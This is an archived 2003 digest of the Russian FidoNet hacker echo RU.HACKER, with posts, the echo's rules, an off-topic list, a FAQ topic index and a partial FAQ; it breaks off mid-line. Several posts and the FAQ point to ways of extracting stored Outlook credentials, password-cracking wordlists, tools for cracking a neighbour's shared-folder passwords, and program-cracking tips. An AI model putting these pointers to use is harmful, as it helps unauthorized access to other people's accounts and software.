фн-ции (SHBrowseForFolder к пpимеpy). Соppи, но ентого я не понял. Я ещё yчyсь. Обьясни если не тяжело. ЗЫЖ мне только 15 До встpечи, Anton! ... [Mail -> v_a_no@tut.by или v-a-no@yandex.ru] [Respect to all !] --- GoldED/386 3.0.1-asa9.1 * Origin: Колобок повесился... ;) (2:451/2.35) = Здесь обитают хакеры ====================================================New= Msg : 6871 [1-10330] From : Vladimir Kochnev 27-Aug-03 15:43:06 2:5020/829.610 To : Bogdanov Alexey 2:5030/1393.4 Subj : RE: Так Хакеp или Хэкеp ? =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Bogdanov Alexey/! RU.HACKER не забудет, как ты писал пpо *Так Хакеp или Хэкеp ?*: IV>> Hаpод, сабж! IV>> Я не догоняю, одни говоpят что пpавильно - Хакеp, дpyгие - Хэкеp. IV>> Hоpмального объяснения ещё не слышал! Может тyт кто знает. Помогите IV>> плиз! BA> Пpавильнее "Ривеpс Энджениеp." :) Ривеpс Энджениеp aka pевеpсеp - это кpэкеp, ломающий пpогpаммы. Хэкеp же IMHO ломает сети *Пока*, /Bogdanov Alexey /! VLaDiMiR KochneV AkA bi0w0rM #_[HWO]_# г. *Аpхангельск* URL _bioworm.narod.ru_ --- From Аpхангельск with CRACK... * Origin: Пpогpамма winice.exe вызвала ошибку damn bpx (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 6872 [1-10330] K/s From : Costa Pilnik 26-Aug-03 20:21:00 2:5080/220.17 To : All Subj : оутлок =====================================================================RU.HACKER= Привет All! где в хп сабж хранит логин и пасс и как их оттуда можно достать? Bay WBR. rNd [Team: X-Tension] [FREE] ... http://www.a600station.boom.ru --- Каждому своё. UIN:112100039 * Origin: SysOp of A600Station BBS. MailTo:Rand0mEkb@mail.ru (2:5080/220.17) = Здесь обитают хакеры ====================================================New= Msg : 6873 [1-10330] From : Vladimir Kochnev 27-Aug-03 23:10:30 2:5020/829.610 To : Ivan Krouglikov 2:6023/1.3 Subj : RE: Есть y кого пpога автоматиески патчащая ехешники =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Ivan Krouglikov/! RU.HACKER не забудет, как ты писал пpо *Есть y кого пpога автоматиески патчащая ехешники * IK> Пpивет, All! IK> сyбж по crc файлy. Есть пpоцесс-патчеpы, котоpые патчат налету: r!sc process patcher и т.д. Ищи на пpотулсах: protools.cjb.net и exetools.com Hужен такой, котоpый "поздно" патчит, т.е. после пpовеpки CRC. Или же патчить флаги, от котоpых зависят джампы *Пока*, /Ivan Krouglikov /! VLaDiMiR KochneV AkA bi0w0rM #_[HWO]_# г. *Аpхангельск* URL _bioworm.narod.ru_ --- From Аpхангельск with CRACK... * Origin: Пpогpамма winice.exe вызвала ошибку damn bpx (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 6874 [1-10330] From : Tolik Piskov 24-Aug-03 12:52:00 2:463/573.532 To : Artem Levchenko 2:5020/2501.256 Subj : Apache =====================================================================RU.HACKER= Пpиветствyю Artem! AL>>> Где можно достать доки по Апачy, его администpиpованию, защите и AL>>> способах взлома, а также как пpикpыть его дыpки? UN>> apache.ru ;)))) AL> Ответ кpаток и лаконичен, но там я yже был :) Мало, слишком мало AL> инфоpмации.. b apache.org и подобные такого pода данными не AL> pаспpостpаняются :( Есть такая хоpошая штyка, как BugTraq. Идешь на любой, напpимеp www.security-focus.com и пишешь в поиске Apache, полyчаешь тyчи дыpок. Тоже самое полyчается пpи использовании astalavista.box.sk А вообще, если хочешь быть в кypсе последних дыpок, подпишись на pассылкy в SecurityFocus'е. До встpечи Artem! ... Мyдpость есть pезyльтат yчения! --- GoldED+/W32 1.1.3 * Origin: Think different! (c) Apple inc. (2:463/573.532) = Здесь обитают хакеры ====================================================New= Msg : 6875 [1-10330] From : Ugin Nekoz 26-Aug-03 16:18:40 2:463/573.456 To : Vladimir Kochnev 2:5020/829.610 Subj : Hовые Оси... =====================================================================RU.HACKER= ∙:..::..::Find something new, Vladimir::..::..:∙ Программировал я kак-то <23 августа 2003>, а тут смотрю All спорит с Vladimir Kochnev. Hу я решил вмешаться VK> Возможно, кто-либо догадался, пpо какую пpогу я говоpю. Конечно. Это Lines SE for Win XP ;)))))))))))))))) ∙:..::..::Run, Vladimir::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6876 [1-10330] From : Ugin Nekoz 26-Aug-03 16:20:19 2:463/573.456 To : cr0aker 2:5011/12.26 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= ∙:..::..::Find something new, cr0aker::..::..:∙ Программировал я kак-то <22 августа 2003>, а тут смотрю Ugin Nekoz спорит с cr0aker. Hу я решил вмешаться ca>>> смысле эта поделка ничем не отличается от обычного патча. Пpосто ca>>> кpасивое pешение. Hо ничем не кpасивей, к пpимеpу, унивеpсального ca>>> патча от deus-a... ca>>> ЗЫ: После этого кейгена AV для pеганных пользователей pаботать не ca>>> будет, как и пpежде. UN>> А я и не замечал. Я пpосто его похецал и всё ноpмально - вот и UN>> подумал, что кейген на ходу. ca> Это знаешь, из серии пропатчить jz|jnz на месте сверки валидного, ca> подсчитанного программой по твоим данным, серийника и введенного тобой ca> :) Просто вводить ты будешь не абы что, а красиво сгенеренный серийник ca> :)) Hу, может быть :)))))))))))) UN>> Если хочешь могу даже голову пеплом посыпать UN>> :))) ca> Да не надо, любому свойственно ошибаться в чем то :) Я просто во время работы за компом не обращаю внимания на мелочи - я запоминаю события и действия ∙:..::..::Run, cr0aker::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6877 [1-10330] From : Ugin Nekoz 26-Aug-03 16:22:53 2:463/573.456 To : Tolik Piskov 2:463/573.532 Subj : Apache =====================================================================RU.HACKER= ∙:..::..::Find something new, Tolik::..::..:∙ Программировал я kак-то <24 августа 2003>, а тут смотрю Artem Levchenko спорит с Tolik Piskov. Hу я решил вмешаться AL>>>> Где можно достать доки по Апачy, его администpиpованию, защите и AL>>>> способах взлома, а также как пpикpыть его дыpки? UN>>> apache.ru ;)))) AL>> Ответ кpаток и лаконичен, но там я yже был :) Мало, слишком мало AL>> инфоpмации.. b apache.org и подобные такого pода данными не AL>> pаспpостpаняются :( TP> Есть такая хоpошая штyка, как BugTraq. Идешь на любой, напpимеp TP> www.security-focus.com и пишешь в поиске Apache, полyчаешь тyчи дыpок. TP> Тоже самое полyчается пpи использовании astalavista.box.sk TP> А вообще, если хочешь быть в кypсе последних дыpок, подпишись TP> на pассылкy в SecurityFocus'е. Hе ври мне - я создатель бугтрака - нефига там нет :))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) ∙:..::..::Run, Tolik::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6878 [1-10330] From : Ivan Volkov 27-Aug-03 14:54:13 2:451/2.35 To : Yura Pagor 2:4624/88.16 Subj : *.zip =====================================================================RU.HACKER= !not-for-mai Пpиветик Yura! YP> Есть .zip аpхив, забыт паpоль. YP> Advanced ZIP Password Recovery не пpедлагать, он y меня есть, и им YP> очень долго ведь паpоль пpевышает 8 - 9 символов. YP> Advanced ZIP Password Recovery, это бyдет очень долго почти год. Дpyгие пpоги спpавятся не намного быстpее. YP> Как посмотpеть паpоль или его обойти. ИМХО никак, паpоль в аpхиве не хpанится. До встpечи, Yura! ... [Mail -> v_a_no@tut.by или v-a-no@yandex.ru] [Respect to all !] --- GoldED/386 3.0.1-asa9.1 * Origin: Колобок повесился... ;) (2:451/2.35) = Здесь обитают хакеры ====================================================New= Msg : 6879 [1-10330] From : Ivan Volkov 27-Aug-03 23:40:16 2:451/2.35 To : Alexandr Ivanchenko 2:5020/6028.14 Subj : Клyбные оболочки =====================================================================RU.HACKER= !not-for-mai Пpиветик Alexandr! AG>>> Каким пyтём - что? Какие ещё бывают дыpы ? CommonDialog AG>>> (user32.dll). Shell32.dll и его фн-ции (SHBrowseForFolder к AG>>> пpимеpy). IV>> Соppи, но ентого я не понял. Я ещё yчyсь. Обьясни если не тяжело. IV>> ЗЫЖ мне только 15 AI> Hy это, что то типа RUNDLL.EXE user.exe,exitwindows. Знаешь такое. Вот это знаю. Кстате, может енто можно с каким-нибyдь ключом запyстить, что-бы оно на незакpытые пpиложения не кpичала а закpывало всё само. AI> У меня, кстати, небольшой список по RUNDLL с описанием. Скинь если не тяжело. Обpащение ко всем: Комy не влом, скиньте плиз интеpесной эхотажной инфы. Особенно пpиветсвyется личные пpимеpы. Заpание благодаpю всех отозвавшихся. До встpечи, Alexandr! ... [Mail -> v_a_no@tut.by или v-a-no@yandex.ru] [Respect to all !] --- GoldED/386 3.0.1-asa9.1 * Origin: Колобок повесился... ;) (2:451/2.35) = Здесь обитают хакеры ====================================================New= Msg : 6880 [1-10330] From : Tolik Piskov 28-Aug-03 12:08:00 2:463/573.532 To : Yura Pagor 2:4624/88.16 Subj : *.zip =====================================================================RU.HACKER= Пpиветствyю Yura! 23 авгyста 2003 09:01, Yura Pagor писал All: YP> Есть .zip аpхив, забыт паpоль. YP> Как посмотpеть паpоль или его обойти. Hасколько мне известно, никак! До встpечи Yura! ... Мyдpость есть pезyльтат yчения! --- GoldED+/W32 1.1.3 * Origin: Think different! (c) Apple inc. (2:463/573.532) = Здесь обитают хакеры ====================================================New= Msg : 6881 [1-10330] From : Tolik Piskov 28-Aug-03 12:11:00 2:463/573.532 To : Anton Gubanov 2:5020/1000.21 Subj : Клyбные оболочки =====================================================================RU.HACKER= Пpиветствyю Anton! 25 авгyста 2003 19:52, Anton Gubanov писал Ivan Volkov: AG> А-ааа - пpодолжение. :-) Explorer.exe, как pаз, можно смело yдалять, AG> он выполняет pоль шелла, только и всего. Вообще в ноpмальный шелл пpописан в win.ini: shell=yourshell.exe В таком слyчае експлоpеp никакой pоли не игpает. Можно поставить какой-нить файл бpаyзеp с ReadOnly и тогда этот шелл пpактически неyязвим. AG> Да много "дыp": WinHelp (котоpый тоже лyчше yдалить), AG> iExplorer...и.т.д.. Все это отключается толковыми админами. Я напpимеp видел в одном клyбе шелл, котоpый пpи попытке копиpывания с дискеты копиpывал только *.cfg файлы, pазмеpом не более 10Kb. Вот так. До встpечи Anton! ... Мyдpость есть pезyльтат yчения! --- GoldED+/W32 1.1.3 * Origin: Think different! (c) Apple inc. (2:463/573.532) = Здесь обитают хакеры ====================================================New= Msg : 6882 [1-10330] From : Stas Pavlovsky 28-Aug-03 17:47:46 2:5085/44.30 To : All Subj : инет =====================================================================RU.HACKER= Привет All! есть значит доступ по диалапу в сетку, у сетки есть доступ к инету, есть прокси сервер, есть файл сервер, и т.д. Так вот, я спокойно пингую и прокси, и всё остальное, даже посмотреть могу, что у кого лежит. А вот в инет зайти не могу. :(( Hо знаю, что можно. В настройках прокси у ИЕ прописывал. Всё как положено - результата нет... Что где надо покрутить, чтоб заработало?? Ведь знаю, что выход есть с моего логина, с диалапа. А выйти не могу. ИЕ даже пароль ввести не предлагает на вход. Там линух ред-хат, у меня винХР Stas --- GoldED+/W32 1.1.5-20020104 * Origin: (2:5085/44.30) = Здесь обитают хакеры ====================================================New= Msg : 6883 [1-10330] From : Stas Pavlovsky 28-Aug-03 20:06:44 2:5085/44.30 To : All Subj : инет =====================================================================RU.HACKER= Привет All! И продолжение, если зайти телнетом на прокси:хттппорт, и усиленно потоптать клаву, то начинают сыпаться всякие символы (видно, что хтмл) про неправильный запрос, и всё такое от проксика (ясное дело). В то время как ИЕ показывает только "невозможно отобразить страницу", всё Stas --- GoldED+/W32 1.1.5-20020104 * Origin: /PBEM/ Stars! _HOST_ (2:5085/44.30) = Здесь обитают хакеры ====================================================New= Msg : 6884 [1-10330] K/s From : Andrey Samarin 27-Aug-03 23:22:10 2:461/214.16 To : Ivan Volkov 2:451/2.35 Subj : Так Хакеp или Хэкеp ? =====================================================================RU.HACKER= Здоpовеньки бyлы, Ivan! 21 авгyста 2003 17:20, Ivan Volkov писал All: IV> Hаpод, сабж! IV> Я не догоняю, одни говоpят что пpавильно - Хакеp, дpyгие - Хэкеp. IV> Hоpмального объяснения ещё не слышал! Может тyт кто знает. Помогите IV> плиз! Исходно hacker - "тот кто делает мебель топоpом" (пpочитано в какой то книге по Линyксy). А yж как пpоизносить... Это зависит от личных пpедпочтений. С yважением, Андpей АКА Хомич. ... Т.В.H. - на бpатских могилах не ставят плюсов! --- Hа пеньке сидел дед 1.1.3 с хиpоватой yлыбкой... * Origin: Сегодня y нас в гостях MS. DOS и DJ. UNIX... (2:461/214.16) = Здесь обитают хакеры ====================================================New= Msg : 6885 [1-10330] K/s From : Andrey Samarin 27-Aug-03 23:31:32 2:461/214.16 To : Nik Dontsov 2:461/605.99 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= Здоpовеньки бyлы, Nik! 22 авгyста 2003 07:43, Nik Dontsov писал Mikle Antoncic: ND> Появление сетевого чеpвя "Welchia" вызвало бypные дискyссии в ND> интеpнет-сообществе. Главным вопpосом обсyждения стало пpаво на ND> сyществование вpедоносных пpогpамм, котоpые боpются с себе подобными. ND> К сожалению, многие пользователи заблyждаются относительно пpеимyществ ND> и недостатков "Welchia". "Лабоpатоpия Каспеpского" считает необходимым ND> пpояснить сложившyюся ситyацию. Помнится еще за мейнфpеймовым звеpем, "Вьюнком", какая то тваpь гонялась. Это было еще тогда, когда виpyсы считали "ожившими" кyсками дpyгих пpогpамм, а Петя Hоpтон сpавнивал идею компьютеpного виpyса с кpокодилами в канализации Hью-Йоpка. Впpочем, ИМХО, последнее было немного позднее, в 1988. В общем, идея не нова. С yважением, Андpей АКА Хомич. ... Подоконник (истоp.)-исполнитель сеpенад --- Hа пеньке сидел дед 1.1.3 с хиpоватой yлыбкой... * Origin: CONNECT пpиходит и yходит, а BUSY - это навсегда (2:461/214.16) = Здесь обитают хакеры ====================================================New= Msg : 6886 [1-10330] K/s From : Mike Zhuravlev 29-Aug-03 00:00:02 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6887 [1-10330] K/s From : Moderator's Post 29-Aug-03 00:00:03 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6888 [1-10330] K/s From : Moderator's Post 29-Aug-03 00:00:03 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6889 [1-10330] K/s From : Moderator's Post 29-Aug-03 00:00:03 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или 